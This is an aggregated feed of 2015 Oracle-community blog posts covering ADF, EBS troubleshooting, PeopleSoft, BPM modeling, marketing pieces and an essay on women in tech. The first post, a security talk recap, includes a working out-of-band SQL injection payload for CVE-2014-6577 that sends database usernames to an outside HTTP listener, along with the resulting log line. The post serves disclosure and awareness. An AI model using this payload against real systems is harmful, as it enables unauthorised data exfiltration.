Feed aggregator

DOAG 2015: Best of Oracle Security 2015

Alexander Kornbrust - Thu, 2015-11-19 02:27

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting 11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-

http://www.oraexploit.com/id=47′ or  1=extractvalue(xmltype(‘<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://192.168.83.1:8080/A=’||substr((select sys.stragg(distinct username||’-‘) as string from all_users),1,220)||'”> %remote; %param1;]>’),’/l’)

192.168.83.131 – – [18/Nov/2015 00:48:02]  “GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0” 404 –

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

How Terminal Emulation Assists Easy Data Management

Kubilay Çilkara - Wed, 2015-11-18 21:25
Just about every company will need terminal emulation at some point. Yours may not need it now, but as time goes on, the day will come when you need information that can only be accessed with an emulator. This software allows a computer to basically take on the functionality of an older version. Doing so makes it possible for the user to access data that would otherwise be impossible to find. If you’re not sold on the benefits of using this type of software, consider the following ways that it assists with making data management easier.

Obtain Data from Outdated Systems

This is the most obvious way a terminal emulator helps with data management. Right now, you could have all kinds of data out of reach because it was created with software you no longer used or stored on a platform that differs from the current one on your system.

Without an emulator, you’re basically without options. You simply have to find a workaround. The best solution would involve using a machine with the old operating system installed. This isn’t just extremely inconvenient though; it also isn’t very cost-effective and is sure to become a bottleneck sooner or later.

With terminal emulation, no data ever has to be out of reach. Whether its information from 10 years ago or 20, you can quickly retrieve whatever it is you need.

Access Multiple Terminals at Once

There’s far more these applications can do to assist with data management though. Over time, your company has probably—or will, someday—go through multiple platforms. This means that going back and grabbing the data you need could involve more than one system. If you tried using the aforementioned workaround, you’d be in for a huge challenge. It would take multiple computers, each with a specific operating system and then going between them to get the information you need or cross reference it as necessary.
Modern emulators can access as many terminals as you need all on the same computer. Usually, it just involves putting each one on separate tabs. Not only can you get all the info you need, then, you can do it from the screen all at once. This makes it extremely easy to cross reference data from one system against others.

Customize Your Queries
Another great benefit that comes with terminal emulation is that you can actually customize your searches to various degrees. For many companies, accessing old data means looking at screens that represent the info in the most rudimentary of ways. There may only be a few colors used for fonts on a black screen. Obviously, this can make data management a bit of a challenge, to say the least.
With the right software, though, you can control the font color, the character size, background and more. This makes it much easier to see the information you want, highlight it and otherwise keep track of the data. Never again suffer through old screens from outdated platforms when you need something.

Mobile Functionality

Like just about everything these days, terminal emulators have now gone mobile. You can now pull off emulation from just about anywhere in the world on your mobile device. This is a great way to make emulation possible for any work at home employees who may be working for your company. If you hire on a consultant or freelance professional from somewhere outside the office, mobile functionality means they can now benefit from easy data management. Next time you’re on a business trip and need to access information from yesteryear, the ability to do so will be at your fingertips.

Mobile functionality may not seem like the most important aspect to have as far as emulation is concerned, but it’s better to have the option there than wish it was possible.

Save Money

Data management can be a costly endeavor. Unfortunately, it’s one of those costs your company really can’t hope to avoid. You need to manage your data, so you better find room in your budget. With terminal emulation, you can at least save money on this essential process.

Like we brought up earlier, without an emulator, you’re looking at a lot of hardware in order to make sure vital data is never out of reach, to say nothing of how inconvenient that option would be. You’re also looking at the potential costs of losing that data if anything happens to your dedicated machines. Furthermore, added hardware always comes with extra costs. There’s the space you need, electricity, IT support and more.

In light of those added expenses, simply using emulation software should be a no-brainer. You don’t need any extra hardware and these platforms are designed to stay out of the way until you need them, so they won’t hurt your staff’s ability to use their current machines.

Limitless Scalability

No matter what kind of software we’re talking about, scalability always needs to be a concern. Today, your company may only have so much data to manage. A year from now, though, there’s going to be a lot more. Five years from now, your company’s collection of data will be expansive.
Obviously, managing this data efficiently is going to take a resource that can scale without difficulty. Keep in mind that a lot of companies increase their amount of data exponentially. This means scalability is necessary, but so is being able to scale at a moment’s notice to whatever size is needed.
Terminal emulation and scalability are virtually inseparable when you have the right software. No alternative solution is going to be able to keep up. Again, if you tried using hardware to manage your data, you can forget about easy scalability and forget about doing so without spending a lot of money in the process.


Data management needs to be a priority for every organization, no matter what industry they’re in. However, simple data management isn’t enough anymore. Instead, you need emulation software that will make it easy, cost-effective and scalable. Otherwise, your business will always be greatly limited in what information it can access and the benefits that could be derived from it.


Mike Miranda writes about enterprise software and covers products offered by software companies like Rocket software about topics such as Terminal emulation,  Enterprise Mobility and more.
Categories: DBA Blogs

Are you a PL/SQL Developer? [Fixed Link]

Gerger Consulting - Wed, 2015-11-18 06:18
Then attend our webinar and learn how you can build first class web applications with PL/SQL.



The application above is built using only PL/SQL and Formspider. No Java, no JavaScript. Join our webinar and learn how. Every attendee will get priority access to the source code of this application. We'll also give you an opportunity to purchase Formspider at a discount. :-) Sign up today.
Categories: Development

Presentation slides for my presentation at DOAG 2015 - Apache - ORDS Setup for Production Environments

Dietmar Aust - Wed, 2015-11-18 05:41
Hi guys,

here you can find the slide, the config files and installation steps for my presentation at the DOAG conference in Nürnberg on 18.11.2015:

http://www.opal-consulting.de/downloads/presentations/2015-11-DOAG-ORDS-Setup/

Enjoy!

Cheers,
~Dietmar.

IBM Bluemix Secure Gateway Service Step by Step Demo

Pas Apicella - Tue, 2015-11-17 21:15
I created this simple step by step guide on how to use the IBM Secure Gateway Service. Very simple demo which shows how easy it is to set this up and open a world of possibilities from on premise resources directly exposed via Bluemix whether it's PUBLIC or Dedicated/LOcal Instances

https://dl.dropboxusercontent.com/u/15829935/bluemix-docs/secure-gateway/index.html



Categories: Fusion Middleware

Remote TaskFlows/Remote Region - For Advanced Reusability in Oracle ADF

Shay Shmeltzer - Tue, 2015-11-17 17:56

A new feature in Oracle ADF 12.2.1 is Remote TaskFlows (or Remote Regions) - this allows one application to have regions inside it that are populated from taskflows that are running as part of another application.

Initially some of you might be a bit confused - "wasn't this something that we were able to do with ADF libraries already? We could just package a taskflow from one app as an ADF library and use that library in the other application".

The slight distinction here is that the library approach had the taskflow running as part of your consuming application. Remote task flows on the other hand have the taskflow running as part of the other application and don't require the creation of a library. As a result they also don't require an ADF library update when the taskflow changes- the minute the changes are deployed on the remote server, your application will get the new version. 

One way of thinking about remote taskflows is as adding a "portal" like functionality to your ADF app - allowing one app to display parts of another app leveraging the other app resources for executing any logic. 

Here is a quick video demoing how to configure and run this.

The URLs you'll need for creating the remote region resource connection are:

http://yourserver:port/your-context-root/rtfquery

and

http://yourserver:port/your-context-root/rr

Note that there are some limitation on the type and functionality of taskflows that can be exposed as remote taskflows. And there are other things to consider such as security and session timeout settings. So have a read through the remote region documentation before you start leveraging this feature.

A couple of notes.

1. In the currently available 12.2.1 version of JDeveloper from OTN, there is a slight bug that will prevent you from creating the connection to the remote task flow - there is a patch available for this from Oracle Support - request the patch for bug 22132843 or 22093099.

2. At my OOW session about new features I mentioned that remote task flows are loaded in parallel, that is actually still not the case, while we started work on this capability - it didn't made it into 12.2.1. So remote task flows behave like other task flows and load in sequential way right now. 

Categories: Development

PeopleSoft Information Portal--New and Improved!

PeopleSoft Technology Blog - Tue, 2015-11-17 17:01

The PeopleSoft Info Portal is a popular one-stop shop for getting at everything PeopleSoft. If you are looking for information on PeopleSoft and wondering where to begin, that is often the best place to start. It's an easy name to remember: www.peoplesoftinfo.com The new site is responsive, so you can access it from any form factor.  If you have any questions or want to find out what's new, what's coming in the future, where to learn more--try the PeopleSoft Information Portal.


Be Quick, But Don't Hurry

Floyd Teter - Tue, 2015-11-17 11:38
Over the month since I've joined Oracle, many people has asked about the work I'm doing here.  And, in all honesty, the work is so varied that I've had a difficult time describing it.

Yesterday, I was traveling from my home in Salt Lake to Oracle Corporate HQ in Redwood Shores.  Having landed in San Francisco, I was in a rush to get my rental car, make the drive to HQ, and get some productivity out of what was left of my day.

In San Francisco, you take a light rail to get from the airline terminals to the rental car building.  The rail lines run every 10 minutes.  As I was approaching the platform to pick up the light rail, one of those every-10-minute trains was just pulling into the station.  So I hefted my two carry-on bags and started a mad dash to the train.  And about four steps into that mad dash, I tripped and fell...luggaging flying, me on the ground, cussing up a storm.  Know why I tripped?  For the classic reason...my shoe lace was untied.

I was in such a hurry that I failed to check my shoelaces anywhere between leaving the plane and my failed attempt at breaking the Earth's gravitational pull.

My favorite basketball coach of all time, John Wooden, has a coach principle of "be quick, but don't hurry".  The idea was to have an efficient system and work with a sense of urgency within that system.  That's being quick.  When you step out of the boundaries to get something done as soon as possible, you're in a hurry...but at the risk of no longer being quick.  Your shoelaces come untied, you trip, and the mistake causes you to miss the light rail altogether.  You invest more time in waiting for the next opportunity...mission bjorked.

So one of the primary things I'm doing at Oracle?  Working on enabling those around me to be quick while discouraging them from being in a hurry.  That's a big chunk of what a good Center of Excellence does.

Are you a PL/SQL Developer? Are you an Oracle Forms Developer?

Gerger Consulting - Tue, 2015-11-17 01:45
Then attend our webinar and learn how you can build first class web applications with PL/SQL.



The application above is built using only PL/SQL and Formspider. No Java, no JavaScript. Join our webinar and learn how. Every attendee will get priority access to the source code of this application. We'll also give you an opportunity to purchase Formspider at a discount. :-) Sign up today.
Categories: Development

sqlplus core dumps with segmentation fault error in OEL 6.6 when you connect to DB

Vikram Das - Mon, 2015-11-16 16:23
We have used OEL 6.6 image in our latest build.  When we cloned an EBS R12.2 instance that was on OEL 5.7 to this new server that has OEL 6.6, During the clone, adcfgclone.pl was failing. On further checks, we discovered that sqlplus is crashing with segmentation fault error whenever we tried to connect to database:

sqlplus /nolog
conn apps/apps
Segmentation Fault

So, I suggested the DBAs to do strace sqlplus apps/apps.  The strace revealed many missing libraries:

We had another working OEL 6.4 instance where we checked for these libraries, and all of them were present.

The locate command was used to locate the full directory paths of the missing libraries

locate libnss_sss.so.2
/lib/libnss_sss.so.2

/lib/libnss_sss.so.2
/lib/libnss_files.so.2
/lib/libociei.so
/lib/libc.so.6
/lib/libgcc_s.so.1
/lib/libnsl.so.1
/lib/libpthread.so.0

Then rpm -qf command was used to find out the rpm that would have the library:

$ rpm -qf /lib/libnss_sss.so.2
sssd-client-1.11.6-30.el6_6.3.i686
$ rpm -qf /lib/libnss_files.so.2
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libociei.so
error: file /lib/libociei.so: No such file or directory
$ rpm -qf /lib/libc.so.6
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libgcc_s.so.1
libgcc-4.4.7-3.el6.i686
$ rpm -qf /lib/libnsl.so.1
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libpthread.so.0
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libm.so.6
glibc-2.12-1.149.el6_6.9.i686
$ rpm -qf /lib/libdl.so.2
glibc-2.12-1.149.el6_6.9.i686

Since 10.1.2 home is 32-bit in EBS R12.1 and 12.2, all the libraries needed to be 32-bit.

Except for sssd-client, the other rpms were present.  64-bit version of sssd-client was present and whenver we tried to install the 32-bit rpm it would give this error, as the operating system thinks that it is already installed:

# yum install sssd-client.i686
Loaded plugins: security
Setting up Install Process
Resolving Dependencies
--> Running transaction check
---> Package sssd-client.i686 0:1.12.4-47.el6 will be installed
--> Finished Dependency Resolution
Error:  Multilib version problems found. This often means that the root
       cause is something else and multilib version checking is just
       pointing out that there is a problem. Eg.:

         1. You have an upgrade for sssd-client which is missing some
            dependency that another package requires. Yum is trying to
            solve this by installing an older version of sssd-client of the
            different architecture. If you exclude the bad architecture
            yum will tell you what the root cause is (which package
            requires what). You can try redoing the upgrade with
            --exclude sssd-client.otherarch ... this should give you an error
            message showing the root cause of the problem.

         2. You have multiple architectures of sssd-client installed, but
            yum can only see an upgrade for one of those arcitectures.
            If you don't want/need both architectures anymore then you
            can remove the one with the missing update and everything
            will work.

         3. You have duplicate versions of sssd-client installed already.
            You can use "yum check" to get yum show these errors.

       ...you can also use --setopt=protected_multilib=false to remove
       this checking, however this is almost never the correct thing to
       do as something else is very likely to go wrong (often causing
       much more problems).

       Protected multilib versions: sssd-client-1.12.4-47.el6.i686 != sssd-client-1.11.6-30.el6_6.4.x86_64


# rpm -qa | grep sssd-client
sssd-client-1.11.6-30.el6_6.4.x86_64

Eventually we installed it with force option

# rpm -Uvh --force /tmp/sssd-client-1.11.6-30.el6_6.3.i686.rpm

# rpm -qa | grep sssd-client
sssd-client-1.11.6-30.el6_6.3.i686
sssd-client-1.11.6-30.el6_6.4.x86_64

pam-ldap was one of the other rpms that was installed for other missing libraries.  Surprisingly, sssd-client and pam-ldap rpms are not mentioned as pre-requisites in support.oracle.com article:
Oracle E-Business Suite Installation and Upgrade Notes Release 12 (12.2) for Linux x86-64 (Doc ID 1330701.1) 
Categories: APPS Blogs

twm: unable to open fontset "-adobe-helvetica-bold-r-normal--*-120-*-*-*-*-*-*"

Vikram Das - Mon, 2015-11-16 15:59
While launching twm, it gives this error and exits to unix prompt:

twm: unable to open fontset "-adobe-helvetica-bold-r-normal--*-120-*-*-*-*-*-*"

I found a solution on http://ubuntuforums.org/archive/index.php/t-1596636.html :

It was reported here for fedora: https://bugzilla.redhat.com/show_bug.cgi?id=509639. The workaround is to execute it with a specific shell variable:

$ LANG=C
$ export LANG
twm &

twm launches fine after this.
Categories: APPS Blogs

REST based CRUD with Oracle ADF Business Components

Shay Shmeltzer - Mon, 2015-11-16 12:17

A key new feature in Oracle ADF 12.2.1 is the ability to expose ADF Business Components through REST/JSON interfaces.

REST/JSON is the preferred interface for many client side UI technologies to access remote backend services - as examples both Oracle JET and Oracle MAF leverage REST as the way to access data from remote servers. 

Oracle ADF makes it very simple to expose your existing business components as REST services - all through a declarative set of dialogs.

Once you published the service interface for a view object, you should be able to do the full set of CRUD operation on that object through different REST action:

GET - will do a Read

POST - will do a Create

PATCH - will do an Update

DELETE - will do a Delete

One thing that you'll want to verify is that when you are passing JSON data back into the REST interface you specify in the header that:

Content-Type is application/vnd.oracle.adf.resourceitem+json

otherwise you'll get an error along the lines of:

oracle.adf.internal.model.rest.core.exception.CannotParseContentException: The content type is not a ADFm REST entity. Content-Type: text/plain 

In the video below I show very quickly how to expose a REST interface and then how to invoke all the CRUD operations directly from the chrome app "Postman". 

These new feature can make your Oracle ADF business services part of any new application that prefers to use REST/JavaScript/HTML5 type of architecture.

Read more about exposing Oracle ADF BC as REST in the documentation

Categories: Development

Women in Tech: Where Are They?

Usable Apps - Sun, 2015-11-15 12:39
0 0 1 710 4047 Oracle America, Inc. 33 9 4748 14.0 Normal 0 false false false EN-US JA X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Cambria; mso-ascii-font-family:Cambria; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Cambria; mso-hansi-theme-font:minor-latin;}

Watching thousands of techies storm the floors and swarm the 20+ summits at Web Summit 2015 was an extraordinary experience. As I really looked at the people walking around, though, I couldn’t help thinking, “Where are the women?” Of course I saw women, but I saw far fewer women than men.

Web Summit Centre Stage

Web Summit Centre Stage

Not relying on my own unofficial observations, I noted a V3 article that not only validated my observations with reflections that mimicked mine but went on to share this data point from Capgemini: “only 18 percent of speakers at Web Summit 2015 were women.”

To be fair, though, throughout the Web Summit, significant awareness was placed on the ever troubling lack of women in professional roles in tech. Hearing different speakers and panelists comment on the state of Women In Technology (WIT) got me wondering: Who exactly are WIT? And why wouldn’t more women pitch up “at the best technology conference on the planet” (Forbes)?

Unofficially I asked somewhere around 50 +/- people from both inside and outside of the software industry to tell me who they think WIT are. I found it interesting that the majority of those who answered mentioned engineering, scientific, and developer job titles or gave me the name of a woman they know who holds a role with a similar job title.

These responses got me thinking about the shape of WIT—who’s in, who’s out. Without a doubt, those women who hold roles with technical job titles are in. But what about those women who have dedicated their entire careers to the tech industry but don’t hold job titles that include the word engineer or developer—women, for example, who design (but don’t build) software or those who write about how to extend or customize software?

Shouldn’t women who’ve built careers in technology and who’ve spent years deep-dive learning about specific industries, domains, software, platforms in order to write content that enables users, as well as those who who’ve spent years designing user experiences as well as developing conceptual object and data models, or those who occasionally code—but never held a job title that includes engineer or developer—count, too?

 Partner, thrive or die session

Microsoft’s Peggy Johnson, EVP, Business Development: Partner, thrive or die session

During my three days at the Web Summit, I attended as many sessions as I could in which women were speakers or panelists. I was hoping to learn from them—learn more about the “who counts” aspect of WIT, as well as hear creative proposals or solutions that address the gender imbalance in the tech world. While today’s grassroots efforts, such as Black Girls Code and CoderDojo, are fantastic, we need to proactively create a next generation of tech women, or we will simply continue having this same conversation.

Sinead Murphy’s “commitment to change” gave me hope that the momentum towards such change is increasing: “As part of an initiative we’re [Web Summit] running to even the gender ratio at our events, we’re giving 10,000 complimentary tickets to our events to women in the tech industry across the world – we hope that it will, in some small way, contribute to solving the problem." The Web Summit will invite “10,000 female entrepreneurs as [Web Summit] guests in 2016.” The Women In Tech Summit will be held in Lisbon next year.

An equally remarkable commitment was announced at Oracle OpenWorld 2015. Oracle CEO Safra Catz announced Oracle’s plan to build a new public school, d.tech, saying, “I’ve realised it’s absolutely critical that big companies like ours […] to do something because when you look at the statistics, you realise there are simply not enough women in the pipeline in the math and science education areas.” For more about this new high school, read the diginomica article, Oracle OpenWorld 2015 - Safra Catz on the tech industry's female talent pipeline problem.”

Clearly these are excellent examples of forward movement. But we—ALL women who work in tech, as well as our male colleagues—have the opportunity to step up and do more. The challenge of drawing more women into all types of tech roles—no matter the job title—belongs to each and every one of us. What will you do?

0 0 1 45 260 Oracle America, Inc. 2 1 304 14.0 Normal 0 false false false EN-US JA X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Cambria; mso-ascii-font-family:Cambria; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Cambria; mso-hansi-theme-font:minor-latin;}

Learn more about Oracle’s WIT in these inspiring stories. And be sure to check out the Oracle Women in Technology Program.

Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured

Vikram Das - Sat, 2015-11-14 14:57
Today, during a cutover when we were moving one of our ERP instance on Cisco UCS VMware VMs to Exalogic and Exadata, I got a call from Bimal.  The extranet iSupplier URL had been configured, but whenever any user logged in, they were seeing the following error instead of the iSupplier OAF Home page:

Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured

A search on support.oracle.com showed many hits.  I went through a few of them and ruled out the solutions given. This article sounded promising: Oracle SSO Failure - Unable to process request Either the requested URL was not specified in terms of a fully-qualified host name or OHS single sign-on is incorrectly configured (Doc ID 1474474.1).

The solution suggested:

There is  a hardware load-balancer for a multi-tier environment on place, as well as an SSL accelerator.

     For R12, there is a context variable, s_enable_sslterminator, that was set to "#".

     This should be null for e-Business R12 using specific hardwarementioned before.


1. Set  context variable, s_enable_sslterminator to null,

2. Re-ran autoconfig,

3. Re-test Single sign-ons via IE and Firefox now works as expected.

I asked the DBAs to check the value of s_enable_sslterminator:

grep s_enable_sslterminator

and sure enough the value was #

As per article Enabling SSL or TLS in Oracle E-Business Suite Release 12 (Doc ID 376700.1), the value of s_enable_sslterminator should be made null if you are using an SSL accelerator.  In our case we use SSL certificate on the Load Balancer and never on Web servers.

The DBAs removed the #
Ran autoconfig
Deregistered SSO
Registered SSO

The user was able to login after that.



Categories: APPS Blogs

Oracle Priority Support Infogram for 12-NOV-2015

Oracle Infogram - Thu, 2015-11-12 15:22

OpenWorld

Another OpenWorld is in the books, and now it’s time to absorb and pursue the material covered. Here’s a good place to get started: Continue Learning Post-Oracle OpenWorld

RDBMS


WLS

The complete guide to tuning the appearance of NetBeans, from WebLogic Partner Community EMEA.


Security

Security Alert CVE-2015-4852 was released on November 10th, 2015.

This vulnerability, which involves the Apache Commons and Oracle WebLogic Server, has received a CVSS Base Score of 7.5.

Due to the severity of CVE-2015-4852, Oracle strongly recommends applying mitigation steps and patches as soon as available.

The Security Alert Advisory for CVE-2015-4852 is the starting point for relevant information. This Security Alert provides mitigation recommendations to be implemented while awaiting the release of Oracle WebLogic Server patches. It includes links to other important documents that provide a list of affected products and the patch availability information. It is essential to review the Security Alert supporting documentation referenced in the Advisory before applying patches or mitigation instructions.

The Security Alert Advisory is available at the following location:
http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html

Mitigation instructions are available at: https://support.oracle.com/rs?type=doc&id=2076338.1

WebLogic Server Patch Availability information will be updated at:
https://support.oracle.com/rs?type=doc&id=2075927.1

All Oracle Critical Patch Updates and Security Alerts are available on the Oracle Technology
Network at: http://www.oracle.com/technetwork/topics/security/alerts-086861.html

SPARC and Solaris

Virtual HBA in Oracle VM Server for SPARC, from Virtually All The Time.


SPARC M7 Software In Silicon - Useful Webinar, from Notes from the Main Sequence.


Fusion

Fusion Middleware 12c – Selective tracing, from SOA & BPM Partner Community Blog.

Java

When is the next Java update?, from Java Platform Group, Product Management blog.


Oracle Retail


EBS

From the Oracle E-Business Suite Support blog:






From the Oracle E-Business Suite Technology blog:



How to Keep Your Business Process Looking Simple

Jan Kettenis - Thu, 2015-11-12 12:32
There are two key words in Business Process Management Notation (and Language) or BPMN for short that very often seemed to be missed. The first is "business" the second "management". In this posting I will discuss the significance of the first, and how you are in control of that.

In BPMN the word business does not wants to express that it is "just" about modeling business processes. The idea is also that these models should be understandable, or even created by the business. Now one can argue that with respect to the latter BPMN does not always seems to deliver on the promise, or at least not for every business. But I know of a few cases where the business analyst creates the non-technical versions of the model (level 1, and 2 as Bruce Silver would call them), and I know of a significant amount of cases where the business or at least the analyst is able to understand BPMN process models. That is to say, if these models have not been cluttered with technical details.

Unfortunately this cluttering happens quicker that you wish, and too often the executable process models are almost beyond comprehension for the business, while there is no good reason for that. And that is too bad, because you then miss the opportunity to let the executable process model being validated by that business. Observing how process modeling is done at some of my projects, unfortunately I have to conclude that quite a few people are not aware of the problem or don't know how to prevent it, and as I did not (yet) found any references that gives a comprehensive overview of the options offered by the Oracle BPM Suite that can help you out, I discuss them in the following.

Embedded Sub-ProcessThe embedded sub-process is one of the options that most people are aware of, and (generally) reasonably well used. In the example below an embedded sub-process with name "Store Order" contains a script activity "Create Message Header" that constructs the header for the message to be used in the service call activity "Save Order Data". By simply collapsing the embedded sub-process the technical details of how an order is stored, can be hidden for the business that typically does not want to know that a header needs to be created. One could argue they should not even be interested in the fact that this is done synchronously (using a service activity) instead of asynchronously (using a send and receive activity), which also is conveniently hidden by the embedded sub-process.





Except for using it to hide technical details, embedded sub-processes can also be used to determine a scope. This can be done from a business perspective (for example to determine a scope of activities that might be repeated or for which multiple instances should be handled in parallel), but also from a technical perspective (for example as a scope for temporary variables, or exception handling).

The issue I often see with embedded sub-process in action, is that developers very often do not bother collapsing them, still exposing technical details to the business.

One should be aware of a couple of aspects concerning embedded sub-processes. The first is that they are not reusable (meaning you cannot use them elsewhere in the same or any other process model). The second that they come with a little overhead from an audit perspective, as every embedded sub-process results in 2 extra entries (one for the start and one for the end of it).

Reusable Sub-processA reusable sub-process is created as a separate process. The only thing that distinguishes it from other types of processes, is that it has a none start as well as a none end event, and it cannot have an initiator activity. As the name already suggests, a reusable sub-process is never started directly, but only by calling it from some parent process. This is done by the Call activity.

Going back to the step in the example where we want to save order data, and let's assume the order has to be updated more than once, than this makes it a typical candidate for reuse. In the following example a reusable "Order Storage" reusable sub-process has been created that contains this functionality. It has been made a little bit more complex by including a notification activity that will notify the sales representative every time an update of the order has taken place.



The reusable sub-process has access to the /project/ variables (by value), and its own /process/ variables. In other words, the reusable sub-process has access to the "order" project variable. A choice has been made to pass on the email address of the one that has been notified, as an argument. In the reusable sub-process this email address is stored in a (local) "email" process variable.

The choice to define a variable at project versus process level should be made carefully. Project variables are global variables with the following properties:
  • In case of functionality that is executed in parallel, one should be careful that the parallel threads do not make conflicting changes to the same project variable.
  • Simple type project variables are mapped to protected attributes (also known as mapped attributes or flex field), of which there is a limited number (for example 20 protected text attributes). Their values are stored in separated columns (instead of part of the process payload).
  • The lifespan of a project variable is from its initialization up to the end of the (main) process instance.
Like an embedded sub-process, a reusable sub-process is executed in the same thread. A reusable sub-process is only reusable in the same BPM project (composite) and cannot be shared with other projects. A reusable sub-process adds a little bit more auditing overhead than the embedded sub-process to auditing.

Finally, up to version 12.1.2 a Call activity in a BPM project makes it incompatible with any other revision, meaning that you cannot migrate instances. Period. Not even when you deploy the same revision without changing any bit of your code. For most customers I work with, this is a major limitation, and some therefore choose not to use reusable sub-processes.

Process As a Service
The next alternative to a reusable sub-process is the process-as-a-service, which means that you start it with a message start event or send activity. Any response is returned by a message end event or receive activity. As long as the process-as-a-service is part of the same BPM project (composite) it can make use of the project variables, but only by definition, not by value. So all data has to be mapped to and from the process. You can put the process in the same composite, or put it in a composite of its own. The criteria to do the latter would be reuse over composites. When in a separate composite, you cannot reuse the business objects, nor the project variable definitions.

From a functional perspective, the process-as-a-service is equivalent to a reusable sub-process. From a technical perspective it requires more work if you implement it in a separate composite, and it will add extra overhead to auditing (not only BPM auditing, but also every instance will have its own entry in the COMPOSITE_INSTANCE and CUBE_INSTANCE tables). In 11g you will also have to create some custom mechanism to propagate cancellation of the parent instance to child instances, but in 12c this is automatically done (see also http://kettenisblogs.blogspot.nl/2015/08/oracle-soabpm-12c-propagation-of-flow.html).

Detail Activity
Since 12c you can "detail" an activity. With that you can hide logic that is tightly related to an activity, but has to be done using an activity of its own. From the outside a detailed activity looks like any other activity, and keeps the original icon associated with it. The fact that it is detailed you can see by a + sign at the bottom, very much like an embedded sub-process. And basically that is what it is, a specialized embedded activity. You can even have local variables, and in the structure pane it is represented as an embedded sub-process. Again, to keep the business process a "business" process you should try not to get over-exited and put all sorts of logic in it that really belongs somewhere else. Use it only for logic that is tightly coupled to the main activity, but of any importance to the business.

In the following example I have implemented a call to some service that has to happen right after the user activity. It is a technical service call that we don't want to bother the business with, as it concerns a call to a service to confirm the order to the customer. As far as the business is concerned, this is an integral part of the Contact Provider activity, and they should not care if that service is called from the UI or from the process for that matter.



Hope you can make good use of this, and let me know if you have any other suggestion!!

Developing an Application with PL/SQL, the Formspider Way

Gerger Consulting - Thu, 2015-11-12 03:05
On November 24, attend our webinar to watch Professional Consultant Nicholas Mwaura as he talks about his experience with Formspider and shows you how you can build first class applications to impress your prospective customers and end users.

Watch a short demo of the application Nicholas will show you how to build:



During the webinar the following topics will be discussed:
  • The importance of Formspider for PL/SQL developers and Oracle customers
  • Why Oracle Forms applications are very easy to migrate to Formspider
  • Introduction to the demo application
     
  • Building the demo application: How to design the UI, how to work with windows, panels, tabs, trees and various other Formspider components, working with LOV’s, application structure in the database. 
At the end of the webinar, the attendees will get priority access to the source code of the demo application.

During the webinar, each attendee will receive a discount offer for Formspider developer licenses! :-)
 
Sign up to the webinar now!
Categories: Development

JavaScript and PeopleCode Array Parameters

Jim Marion - Tue, 2015-11-10 18:29

I have been experimenting with scripting PeopleCode using JavaScript. This is possible because Java includes Mozilla's Rhino JavaScript engine. I took one of my experiments to OpenWorld 2015 which shows creating a Microsoft Excel Spreadsheet using POI and JavaScript. Here we are, a couple of weeks later, and I see this in the PeopleSoft OTN Discussion Forum: Java Exception: java.lang.reflect.InvocationTargetException: during call of java.lang.reflect.Method .invoke. Perfect! That is my exact use case from OpenWorld. I just happen to have a code sample to share on the forum. The developer's scenario was a bit more complicated. As you will note from the forum post, the developer needed to invoke SQL.Fetch from JavaScript. The JavaScript version of SQL.Fetch, which uses the PeopleCode Java interface, requires an array of selected columns. My first thought was just to use a standard JavaScript array. Since the SQL only has one column, I just needed an array with one item. This didn't work. JavaScript Arrays clearly are not Java Arrays. Here is an example:

var result = (function() {  
var ReflectiveArray = java.lang.reflect.Array;
var CreateSQL = Packages.PeopleSoft.PeopleCode.Func.CreateSQL;
var columns = ReflectiveArray.newInstance(java.lang.Object,
1 /* number of selected columns */);
var results = [];

SQL = CreateSQL("SELECT OPRDEFNDESC FROM PSOPRDEFN WHERE ROWNUM < 10");
while (SQL.Fetch(columns)) {
results.push(columns[0]);
}

return results.join();

}());

Pages

Subscribe to Oracle FAQ aggregator